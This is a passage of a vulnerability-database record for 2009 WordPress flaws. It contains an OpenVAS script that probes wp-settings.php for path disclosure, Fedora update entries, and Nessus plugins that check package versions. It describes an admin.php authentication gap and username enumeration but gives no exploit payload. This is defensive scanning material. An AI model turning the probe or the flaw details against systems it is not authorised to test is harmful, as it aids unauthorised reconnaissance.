{"lastseen": "2020-05-12T17:33:21", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-2334", "CVE-2009-2432", "CVE-2009-2335", "CVE-2009-2336", "CVE-2009-2431"], "description": "The host is running WordPress and is prone to Multiple Vulnerabilities.", "modified": "2020-05-08T00:00:00", "published": "2009-07-18T00:00:00", "id": "OPENVAS:1361412562310800657", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310800657", "type": "openvas", "title": "WordPress Multiple Vulnerabilities - July09", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# WordPress Multiple Vulnerabilities - July09\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:wordpress:wordpress\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.800657\");\n script_version(\"2020-05-08T08:34:44+0000\");\n script_tag(name:\"last_modification\", value:\"2020-05-08 08:34:44 +0000 (Fri, 08 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2009-07-18 09:37:41 +0200 (Sat, 18 Jul 2009)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_cve_id(\"CVE-2009-2432\", \"CVE-2009-2431\", \"CVE-2009-2336\", \"CVE-2009-2335\", \"CVE-2009-2334\");\n script_bugtraq_id(35581, 35584);\n script_name(\"WordPress Multiple Vulnerabilities - July09\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"secpod_wordpress_detect_900182.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_mandatory_keys(\"wordpress/installed\");\n\n script_xref(name:\"URL\", value:\"http://www.vupen.com/english/advisories/2009/1833\");\n script_xref(name:\"URL\", value:\"http://securitytracker.com/alerts/2009/Jul/1022528.html\");\n script_xref(name:\"URL\", value:\"http://www.securityfocus.com/archive/1/archive/1/504795/100/0/threaded\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attackers to view the content of plugins\n configuration pages, inject malicious scripting code, or gain knowledge of sensitive username information.\");\n\n script_tag(name:\"affected\", value:\"WordPress version prior to 2.8.1 on all running platform.\");\n\n script_tag(name:\"insight\", value:\"- Error in 'wp-settings.php' which may disclose the sensitive information via\n a direct request.\n\n - username of a post's author is placed in an HTML comment, which allows\n remote attackers to obtain sensitive information by reading the HTML source.\n\n - Error occur when user attempt for failed login or password request depending\n on whether the user account exists, and it can be exploited by enumerate valid usernames.\n\n - wp-admin/admin.php does not require administrative authentication\n to access the configuration of a plugin, which allows attackers to specify a\n configuration file in the page parameter via collapsing-archives/options.txt,\n related-ways-to-take-action/options.php, wp-security-scan/securityscan.php,\n akismet/readme.txt and wp-ids/ids-admin.php.\");\n\n script_tag(name:\"solution\", value:\"Update to Version 2.8.1 or later.\");\n\n script_tag(name:\"summary\", value:\"The host is running WordPress and is prone to Multiple Vulnerabilities.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_active\");\n\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\ninclude(\"host_details.inc\");\n\nif( ! port = get_app_port( cpe:CPE ) )\n exit( 0 );\n\nif( ! dir = get_app_location( cpe:CPE, port:port ) )\n exit( 0 );\n\nurl = dir + \"/wp-settings.php\";\nreq = http_get( item:url, port:port );\nres = http_keepalive_send_recv( port:port, data:req );\n\nif( \"ABSPATHwp-include\" >< res && \"include_path\" >< res ) {\n report = http_report_vuln_url( port:port, url:url );\n security_message( port:port, data:report );\n exit( 0 );\n}\n\nexit( 99 );\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "fedora": [{"lastseen": "2020-12-21T08:17:49", "bulletinFamily": "unix", "cvelist": ["CVE-2009-2334", "CVE-2009-2335", "CVE-2009-2336"], "description": "Wordpress is an online publishing / weblog package that makes it very easy, almost trivial, to get information out to people on the web. ", "modified": "2009-07-19T10:07:19", "published": "2009-07-19T10:07:19", "id": "FEDORA:6DE2A10F891", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 11 Update: wordpress-2.8.1-1.fc11", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-12-21T08:17:49", "bulletinFamily": "unix", "cvelist": ["CVE-2009-2334", "CVE-2009-2335", "CVE-2009-2336"], "description": "Wordpress is an online publishing / weblog package that makes it very easy, almost trivial, to get information out to people on the web. ", "modified": "2009-07-19T10:17:03", "published": "2009-07-19T10:17:03", "id": "FEDORA:409AD10F89B", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 10 Update: wordpress-2.8.1-1.fc10", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-12-21T08:17:49", "bulletinFamily": "unix", "cvelist": ["CVE-2009-2334", "CVE-2009-2335", "CVE-2009-2336"], "description": "WordPress-MU is a derivative of the WordPress blogging codebase, to allow one instance to serve multiple users. ", "modified": "2009-08-15T08:09:49", "published": "2009-08-15T08:09:49", "id": "FEDORA:2260910F855", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 11 Update: wordpress-mu-2.8.4a-1.fc11", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-12-21T08:17:49", "bulletinFamily": "unix", "cvelist": ["CVE-2009-1030", "CVE-2009-2334", "CVE-2009-2335", "CVE-2009-2336"], "description": "WordPress-MU is a derivative of the WordPress blogging codebase, to allow one instance to serve multiple users. ", "modified": "2009-08-15T08:11:21", "published": "2009-08-15T08:11:21", "id": "FEDORA:9869510F855", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 10 Update: wordpress-mu-2.8.4a-1.fc10", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "nessus": [{"lastseen": "2021-01-12T10:07:36", "description": "Update spans MU-versions for the following security releases from\nupstream:\nhttp://wordpress.org/development/2009/08/2-8-4-security-release/\nhttp://wordpress.org/development/2009/08/wordpress-2-8-3-security-rele\nase/\n\n - Backport of XSS fixes from WordPress 2.8.2 * Backport of\n security fixes for admin.php?page= bugs (CVE-2009-2334)\n Backport of security fixes for admin.php?page= bugs\n (CVE-2009-2334) Backport of security fixes for\n admin.php?page= bugs (CVE-2009-2334)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 26, "published": "2009-08-18T00:00:00", "title": "Fedora 10 : wordpress-mu-2.8.4a-1.fc10 (2009-8538)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-2334", "CVE-2009-2335", "CVE-2009-2336"], "modified": "2009-08-18T00:00:00", "cpe": ["cpe:/o:fedoraproject:fedora:10", "p-cpe:/a:fedoraproject:fedora:wordpress-mu"], "id": "FEDORA_2009-8538.NASL", "href": "https://www.tenable.com/plugins/nessus/40601", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2009-8538.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(40601);\n script_version(\"1.19\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2009-2334\", \"CVE-2009-2335\", \"CVE-2009-2336\");\n script_bugtraq_id(34075, 35581, 35584);\n script_xref(name:\"FEDORA\", value:\"2009-8538\");\n\n script_name(english:\"Fedora 10 : wordpress-mu-2.8.4a-1.fc10 (2009-8538)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Update spans MU-versions for the following security releases from\nupstream:\nhttp://wordpress.org/development/2009/08/2-8-4-security-release/\nhttp://wordpress.org/development/2009/08/wordpress-2-8-3-security-rele\nase/\n\n - Backport of XSS fixes from WordPress 2.8.2 * Backport of\n security fixes for admin.php?page= bugs (CVE-2009-2334)\n Backport of security fixes for admin.php?page= bugs\n (CVE-2009-2334) Backport of security fixes for\n admin.php?page= bugs (CVE-2009-2334)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n # http://wordpress.org/development/2009/08/2-8-4-security-release/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://wordpress.org/news/2009/08/2-8-4-security-release/\"\n );\n # http://wordpress.org/development/2009/08/wordpress-2-8-3-security-release/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?3ab4dc04\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=510745\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2009-August/027878.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?22ed89ca\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected wordpress-mu package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:ND\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(16, 287);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:wordpress-mu\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:10\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/08/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/08/18\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^10([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 10.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC10\", reference:\"wordpress-mu-2.8.4a-1.fc10\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"wordpress-mu\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-01-12T10:07:30", "description": " - Fri Jul 10 2009 Adrian Reber <adrian at lisas.de> -\n 2.8.1-1\n\n - updated to 2.8.1 for security fixes - BZ 510745\n\n - Mon Jun 22 2009 Adrian Reber <adrian at lisas.de> -\n 2.8-1\n\n - updated to 2.8\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 25, "published": "2009-07-20T00:00:00", "title": "Fedora 11 : wordpress-2.8.1-1.fc11 (2009-7701)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-2334", "CVE-2009-2335", "CVE-2009-2336"], "modified": "2009-07-20T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:wordpress", "cpe:/o:fedoraproject:fedora:11"], "id": "FEDORA_2009-7701.NASL", "href": "https://www.tenable.com/plugins/nessus/39856", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2009-7701.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(39856);\n script_version(\"1.18\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2009-2334\", \"CVE-2009-2335\", \"CVE-2009-2336\");\n script_bugtraq_id(35584);\n script_xref(name:\"FEDORA\", value:\"2009-7701\");\n\n script_name(english:\"Fedora 11 : wordpress-2.8.1-1.fc11 (2009-7701)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\" - Fri Jul 10 2009 Adrian Reber <adrian at lisas.de> -\n 2.8.1-1\n\n - updated to 2.8.1 for security fixes - BZ 510745\n\n - Mon Jun 22 2009 Adrian Reber <adrian at lisas.de> -\n 2.8-1\n\n - updated to 2.8\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=510745\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2009-July/026561.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?2ce20061\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected wordpress package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(16, 287);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:wordpress\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:11\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/07/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/07/20\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^11([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 11.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC11\", reference:\"wordpress-2.8.1-1.fc11\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"wordpress\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-01-12T10:07:31", "description": " - Fri Jul 10 2009 Adrian Reber <adrian at lisas.de> -\n 2.8.1-1\n\n - updated to 2.8.1 for security fixes - BZ 510745\n\n - Mon Jun 22 2009 Adrian Reber <adrian at lisas.de> -\n 2.8-1\n\n - updated to 2.8\n\n - Wed Feb 25 2009 Fedora Release Engineering <rel-eng at\n lists.fedoraproject.org> - 2.7.1-2\n\n - Rebuilt for\n https://fedoraproject.org/wiki/Fedora_11_Mass_Rebuild\n\n - Wed Feb 11 2009 Adrian Reber <adrian at lisas.de> -\n 2.7.1-1\n\n - updated to 2.7.1\n\n - Wed Nov 26 2008 Adrian Reber <adrian at lisas.de> -\n 2.6.5-2\n\n - updated to 2.6.5\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 25, "published": "2009-07-20T00:00:00", "title": "Fedora 10 : wordpress-2.8.1-1.fc10 (2009-7729)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-2334", "CVE-2009-2335", "CVE-2009-2336"], "modified": "2009-07-20T00:00:00", "cpe": ["cpe:/o:fedoraproject:fedora:10", "p-cpe:/a:fedoraproject:fedora:wordpress"], "id": "FEDORA_2009-7729.NASL", "href": "https://www.tenable.com/plugins/nessus/39859", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2009-7729.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(39859);\n script_version(\"1.18\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2009-2334\", \"CVE-2009-2335\", \"CVE-2009-2336\");\n script_bugtraq_id(35584);\n script_xref(name:\"FEDORA\", value:\"2009-7729\");\n\n script_name(english:\"Fedora 10 : wordpress-2.8.1-1.fc10 (2009-7729)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\" - Fri Jul 10 2009 Adrian Reber <adrian at lisas.de> -\n 2.8.1-1\n\n - updated to 2.8.1 for security fixes - BZ 510745\n\n - Mon Jun 22 2009 Adrian Reber <adrian at lisas.de> -\n 2.8-1\n\n - updated to 2.8\n\n - Wed Feb 25 2009 Fedora Release Engineering <rel-eng at\n lists.fedoraproject.org> - 2.7.1-2\n\n - Rebuilt for\n https://fedoraproject.org/wiki/Fedora_11_Mass_Rebuild\n\n - Wed Feb 11 2009 Adrian Reber <adrian at lisas.de> -\n 2.7.1-1\n\n - updated to 2.7.1\n\n - Wed Nov 26 2008 Adrian Reber <adrian at lisas.de> -\n 2.6.5-2\n\n - updated to 2.6.5\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=510745\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://fedoraproject.org/wiki/Fedora_11_Mass_Rebuild\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2009-July/026605.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?e8bdf78e\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected wordpress package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(16, 287);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:wordpress\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:10\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/07/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/07/20\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^10([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 10.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC10\", reference:\"wordpress-2.8.1-1.fc10\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"wordpress\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-01-12T10:07:36", "description": "Update spans MU-versions for the following security releases from\nupstream:\nhttp://wordpress.org/development/2009/08/2-8-4-security-release/\nhttp://wordpress.org/development/2009/08/wordpress-2-8-3-security-rele\nase/\n\n - Backport of XSS fixes from WordPress 2.8.2 * Backport of\n security fixes for admin.php?page= bugs (CVE-2009-2334)\n Backport of security fixes for admin.php?page= bugs\n (CVE-2009-2334) Backport of security fixes for\n admin.php?page= bugs (CVE-2009-2334)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 26, "published": "2009-08-18T00:00:00", "title": "Fedora 11 : wordpress-mu-2.8.4a-1.fc11 (2009-8529)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-2334", "CVE-2009-2335", "CVE-2009-2336"], "modified": "2009-08-18T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:wordpress-mu", "cpe:/o:fedoraproject:fedora:11"], "id": "FEDORA_2009-8529.NASL", "href": "https://www.tenable.com/plugins/nessus/40599", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2009-8529.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(40599);\n script_version(\"1.19\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2009-2334\", \"CVE-2009-2335\", \"CVE-2009-2336\");\n script_bugtraq_id(35581, 35584);\n script_xref(name:\"FEDORA\", value:\"2009-8529\");\n\n script_name(english:\"Fedora 11 : wordpress-mu-2.8.4a-1.fc11 (2009-8529)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Update spans MU-versions for the following security releases from\nupstream:\nhttp://wordpress.org/development/2009/08/2-8-4-security-release/\nhttp://wordpress.org/development/2009/08/wordpress-2-8-3-security-rele\nase/\n\n - Backport of XSS fixes from WordPress 2.8.2 * Backport of\n security fixes for admin.php?page= bugs (CVE-2009-2334)\n Backport of security fixes for admin.php?page= bugs\n (CVE-2009-2334) Backport of security fixes for\n admin.php?page= bugs (CVE-2009-2334)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n # http://wordpress.org/development/2009/08/2-8-4-security-release/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://wordpress.org/news/2009/08/2-8-4-security-release/\"\n );\n # http://wordpress.org/development/2009/08/wordpress-2-8-3-security-release/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?3ab4dc04\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=510745\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2009-August/027867.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?d10c5281\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected wordpress-mu package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:ND\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(16, 287);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:wordpress-mu\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:11\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/08/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/08/18\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = 